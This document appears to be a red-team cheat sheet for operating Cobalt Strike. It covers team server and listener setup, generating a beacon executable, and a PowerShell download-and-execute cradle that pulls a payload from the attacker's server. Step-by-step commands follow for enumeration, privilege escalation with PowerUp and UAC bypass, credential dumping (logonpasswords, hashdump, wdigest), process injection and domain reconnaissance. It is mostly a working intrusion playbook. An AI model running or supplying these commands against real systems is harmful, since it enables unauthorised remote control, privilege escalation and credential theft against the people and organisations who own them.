Cobalt Strike


Install Java

echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys EEA14886
apt-get update
apt-get install oracle-java8-installer
------------------------------------------------------------------------------------------------------

cd /opt/cobaltstrike/
./update

Start the team server
     ./teamserver <IP> <password> <Malleable C2 profile> <kill date for Beacons>
     The first 2 parameters are required.

     ./teamserver 172.16.100.32 redteam /opt/cobaltstrike-profiles/APT/etumbot.profile
     Copy the SHA256 hash and send to other members on your team.

Login to team server
     Open a new Terminal
     ./cobaltstrike
     Host: IP of team server
     Port: 50050
     User: Lee
     Password: redteam
     Connect
     VerifyFingerprint (compare with the SHA256 hash) > Yes
------------------------------------------------------------------------------------------------------

Create listeners
     Cobalt Strike > Listeners > Add
     Name: http
     Payload: windows/beacon_http/reverse_http
     Host: 172.16.100.32
     Port: 80
     Save > Ok > Ok

     Add
     Name: smb
     Payload: windows/beacon_smb/bind_pipe
     Host: 172.16.100.32
     Port: <greater than 1024>
     Save
------------------------------------------------------------------------------------------------------

Gaining a foothold

Option 1 (touching disk)
     Attacks > Packages > Windows Executable
     Listener: http
     Output: Windows EXE
     x64: Use x64 payload (if needed)
     Generate
     /root/artifact.exe
     Save > Ok

Setup a transfer mechanism
     Open a new Terminal
     cd /var/www/
     mkdir demo
     cd demo/
     mv /root/artifact.exe .
     python -m SimpleHTTPServer

Target VM
     Open a web browser to http://10.10.215.21:8000
     Click artifact.exe to download.
     Double click artifact.exe
     In about 5 sec, you should have a callback on the team server.

Option 2 (not touching disk)
     Attacks > Web Drive-by > Scripted Web Delivery
     URI Path: /a
     Local Host: 172.16.100.32
     Local Port: 80
     Listener: http
     Type: powershell
     Launch
     Copy all of the text > Ok

Target VM
     Open Terminal and paste
     powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(172.16.100.32:80/a'))"
     In about 5 sec, you should have a callback on the team server.
------------------------------------------------------------------------------------------------------

Select the callback in the top pane > right click > Interact
     sleep 0
     note foothold

Enumerate the target
     getuid
     shell ipconfig /all
     shell systeminfo
     ps

     drives
          shell dir E:
          shell type E:\secrets.txt

     shell net accounts
     shell net localgroup
     shell net localgroup Administrators
     shell arp -a

Escalate privledges
     powershell-import /opt/PowerSploit/Privesc/PowerUp.ps1
     powerpick Invoke-AllChecks

     powerpick Invoke-ServiceAbuse -Name 'crappy-serverice'
     spawnas john Password123! smb
     Select john in the top pane > right click > Interact
     bypassuac http

     john should now be running in a high integrity Beacon (see asterisk)

Dump passwords
     logonpasswords
     menu View > Credentials

     ps
     Look for another user logged in and copy the PID of their process.
     inject <PID> <arch> <listener>
     inject 5678 x64 smb
     Select the new user in the top pane > right click > Interact
------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------

Needs admin privs
     shell net view /domain                       Find what domain you are on.
     shell net localgroup Administrators /domain
     shell net group "Domain Computers" /domain   List all computers joined to the domain.
     wdigest                                      See if there are any interesting credentials.
     hashdump                                     Dump the hashes.

Misc
     shell nltest /dclist:<domain>                Locate the domain controller.

